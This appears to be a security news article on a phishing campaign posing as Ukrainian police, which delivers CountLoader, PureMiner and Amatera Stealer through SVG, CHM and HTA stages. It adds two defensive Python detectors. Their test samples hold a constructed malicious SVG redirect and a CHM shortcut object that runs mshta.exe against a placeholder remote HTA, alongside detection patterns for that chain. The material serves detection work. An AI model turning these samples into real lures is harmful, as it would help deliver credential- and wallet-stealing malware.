Attack chain | Image: FortiGuard Labs
FortiGuard Labs recently observed a phishing campaign impersonating Ukrainian government agencies, designed to deliver multiple malware payloads including Amatera Stealer and PureMiner. The operation shows how attackers combine SVG-based phishing lures, CHM helper files and remote HTA scripts to get past attachment filters, and then load the final stealer stage directly into memory rather than dropping it to disk.
The campaign begins with forged emails claiming to be from the National Police of Ukraine. FortiGuard explains, “The phishing campaign begins with a forged email claiming to be a notice from the National Police of Ukraine. The email includes a malicious SVG attachment… The message states that an appeal has been submitted for review and warns that ignoring the notice could lead to further legal action.”
The attachment, “elektronni_zapit_NPU.svg”, embeds HTML that loads a spoofed Adobe Reader interface with the message “Please wait, your document is loading…” in Ukrainian, tricking recipients into downloading a password-protected archive. Because SVG is an XML format that browsers render natively, an SVG attachment can carry HTML and script that run as soon as the recipient opens it, while still looking like an image to many mail filters; the password on the archive keeps the next stage from being scanned at the gateway.
Once extracted, the archive contains a Compiled HTML Help (CHM) file with a malicious shortcut object. CHM files are opened by the Windows help viewer (hh.exe), which renders the embedded HTML and honours the ActiveX shortcut object inside it. FortiGuard notes, “The object’s Click method runs a command that executes a remote HTML Application (HTA) resource in hidden mode.”
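The two lure formats above can both be triaged statically, because neither a benign image nor a benign help page has any reason to contain the constructs the campaign relies on. The following scanner is an added example, not FortiGuard's tooling: it flags SVG attachments that carry script, foreignObject (HTML inside the image) or page navigation, and HTML pages extracted from a CHM (for example with 7-Zip or `hh.exe -decompile`) whose object tags contain a ShortCut command, an mshta invocation or a remote URL. The sample inputs are constructed to match the description in the article; the URLs and file names in them are placeholders, not indicators from the real campaign.

```python
"""Static triage of SVG and CHM-extracted HTML lures (added example, not the campaign's files)."""
import re
from pathlib import Path

# SVG rules: each pattern is something a plain vector image never needs.
SVG_RULES = [
    ("svg-script",         re.compile(r"<(?:\w+:)?script\b", re.I)),          # inline script, any namespace prefix
    ("svg-foreignobject",  re.compile(r"<(?:\w+:)?foreignObject\b", re.I)),   # HTML embedded inside the image
    ("svg-event-handler",  re.compile(r"\son(?:load|click|error|mouseover)\s*=", re.I)),
    ("svg-javascript-uri", re.compile(r"javascript:", re.I)),
    ("svg-navigation",     re.compile(r"window\.location|\.href\s*=|<a\b[^>]*\bdownload\b", re.I)),
    ("svg-base64-blob",    re.compile(r"data:[^\"'\s]*;base64,", re.I)),
]

# CHM rules: a help page whose <object> carries a ShortCut command that runs mshta against a URL.
CHM_OBJECT   = re.compile(r"<object\b.*?</object>", re.I | re.S)
CHM_SHORTCUT = re.compile(r'name\s*=\s*"?command"?\s+value\s*=\s*"?shortcut"?', re.I)
CHM_MSHTA    = re.compile(r"\bmshta(?:\.exe)?\b", re.I)
CHM_REMOTE   = re.compile(r"https?://", re.I)
CHM_CLICK    = re.compile(r"\.click\s*\(", re.I)          # script calling the object's Click method


def scan_svg(text: str) -> list[str]:
    """Return the names of every SVG rule that matches, in rule order."""
    return [name for name, rx in SVG_RULES if rx.search(text)]


def scan_chm_html(text: str) -> list[str]:
    """Return sorted, de-duplicated hits for a page extracted from a CHM."""
    hits = set()
    for match in CHM_OBJECT.finditer(text):
        block = match.group(0)
        if CHM_SHORTCUT.search(block):
            hits.add("chm-shortcut-object")
        if CHM_MSHTA.search(block):
            hits.add("chm-mshta-command")
        if CHM_REMOTE.search(block):
            hits.add("chm-remote-resource")
    if CHM_CLICK.search(text):
        hits.add("chm-object-click")
    return sorted(hits)


def triage(name: str, data: bytes) -> list[str]:
    """Dispatch on extension; unknown types get no verdict rather than a false negative."""
    text = data.decode("utf-8", errors="ignore")
    suffix = Path(name).suffix.lower()
    if suffix == ".svg":
        return scan_svg(text)
    if suffix in (".htm", ".html"):
        return scan_chm_html(text)
    return []


# Constructed samples (placeholders, not the real attachments).
SAMPLE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xhtml="http://www.w3.org/1999/xhtml">
  <foreignObject width="800" height="600">
    <xhtml:div>Please wait, your document is loading...</xhtml:div>
    <xhtml:script>
      setTimeout(function () { window.location = "https://example.invalid/zapit.zip"; }, 1500);
    </xhtml:script>
  </foreignObject>
</svg>"""

BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4"/></svg>'

SAMPLE_CHM_HTML = b"""<html><body>
<OBJECT id="run" width="0" height="0">
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Item1" value=",mshta.exe,https://example.invalid/stage.hta">
</OBJECT>
<SCRIPT>run.Click();</SCRIPT>
</body></html>"""

if __name__ == "__main__":
    for fname, blob in [("lure.svg", SAMPLE_SVG), ("logo.svg", BENIGN_SVG), ("notice.html", SAMPLE_CHM_HTML)]:
        print(fname, triage(fname, blob))
```

The SVG rules are deliberately content-based rather than keyed on the `xmlns` URL, since every legitimate SVG carries `http://www.w3.org/2000/svg`; a rule on bare `http://` would fire on all of them. For the CHM side, the object is only inspected after the archive has been decompiled, so the scanner sits behind whatever unpacks password-protected attachments in the sandbox.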
This triggers CountLoader, an obfuscated HTA script. Its role is clear: “The script’s primary role is to establish a connection with a remote server and wait for the next stage of the payload. Once the connection is made, the malware collects information from the victim’s system and sends it in an HTTP POST request… Afterward, the loader sends an encoded getUpdates message to retrieve additional commands from the server.”
Supported commands include downloading DLLs, executables, or MSI files; executing Python scripts; gathering domain information; and deleting traces of activity.
One of the delivered archives, ergosystem.zip, used DLL sideloading to install PureMiner: a legitimate, signed executable in the archive loads an attacker-supplied DLL placed beside it, so the malicious code runs under a trusted process name. FortiGuard explains, “The decrypted payload has been identified as PureMiner, a stealthy .NET cryptominer. PureMiner collects system information—particularly video adapter specifications and usage details—and can deploy CPU-based or GPU-based mining modules depending on the attacker’s configuration.”
To optimize efficiency, PureMiner checks memory availability and GPU capabilities before launching mining operations. Communication with its command-and-control server is encrypted with 3DES.
Another archive, smtpB.zip, contained a bundled Python interpreter and a script that loaded Amatera Stealer directly into memory using the PythonMemoryModule project, so the stealer itself never lands on disk as a standalone executable that file-based scanners could inspect.
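The execution chain described from the CHM onward (hh.exe running the help file, mshta.exe fetching the remote HTA, and a Python interpreter launched from an extracted archive) leaves a distinctive parent-child trail in process-creation telemetry even when the payload itself stays in memory. The following detector is an added example, not FortiGuard's detection content: it runs a handful of parent-child rules over constructed process events shaped like Sysmon event 1 or EDR process-start records. The paths, PIDs and URL in the sample are placeholders.

```python
"""Process-chain detection for CHM -> mshta -> user-directory interpreter (added example)."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the newly created process
    cmdline: str


REMOTE_URL = re.compile(r"https?://", re.I)
# Directory prefixes an unprivileged user can write to; a binary started from
# here by a script host deserves a look regardless of its name.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
INTERPRETERS = {"python.exe", "pythonw.exe"}


def exe_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def from_user_writable(path: str) -> bool:
    return path.lower().startswith(USER_WRITABLE)


def detect(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Return (pid, rule) pairs; each event is checked against every rule."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e.ppid)
        child = exe_name(e.image)
        parent_name = exe_name(parent.image) if parent else ""
        if child == "mshta.exe" and REMOTE_URL.search(e.cmdline):
            alerts.append((e.pid, "mshta-remote-hta"))          # HTA pulled over HTTP(S)
        if child == "mshta.exe" and parent_name == "hh.exe":
            alerts.append((e.pid, "chm-spawns-mshta"))          # help viewer launching a script host
        if parent_name == "mshta.exe" and from_user_writable(e.image):
            alerts.append((e.pid, "hta-spawns-user-dir-binary"))
        if child in INTERPRETERS and from_user_writable(e.image):
            alerts.append((e.pid, "python-from-user-dir"))       # bundled interpreter from an archive
    return alerts


# Constructed sample telemetry (placeholder paths and URL, not campaign indicators).
SAMPLE_EVENTS = [
    ProcEvent(100, 1,   r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\hh.exe",
              r'"C:\Windows\hh.exe" C:\Users\victim\Downloads\zapit\notice.chm'),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://example.invalid/stage.hta"),
    ProcEvent(400, 300, r"C:\Users\victim\AppData\Local\Temp\smtpB\python.exe",
              r"python.exe C:\Users\victim\AppData\Local\Temp\smtpB\run.py"),
    # Benign control: a system-wide Python install started from Explorer.
    ProcEvent(500, 100, r"C:\Program Files\Python312\python.exe", "python.exe build.py"),
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(pid, rule)
```

The user-writable-path rule will also fire on per-user Python installs under `AppData\Local\Programs`, so in production it is paired with the parent check (a script host such as mshta.exe as the parent) or with an allowlist for known installer paths; the chain rules on hh.exe and mshta.exe are low-noise on their own.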
According to FortiGuard, “Amatera Stealer was used to harvest extensive information from infected systems, including credentials, system data, application data, browser files, and cryptocurrency wallets.”
It targeted both Gecko-based applications (Firefox, Thunderbird, SeaMonkey) and Chromium-based browsers (Chrome, Edge, Brave), extracting cookies, login data, and crypto-wallet extensions such as MetaMask, Trust Wallet, and Coinbase Wallet. It also collected data from applications like Steam, Telegram, FileZilla, and AnyDesk.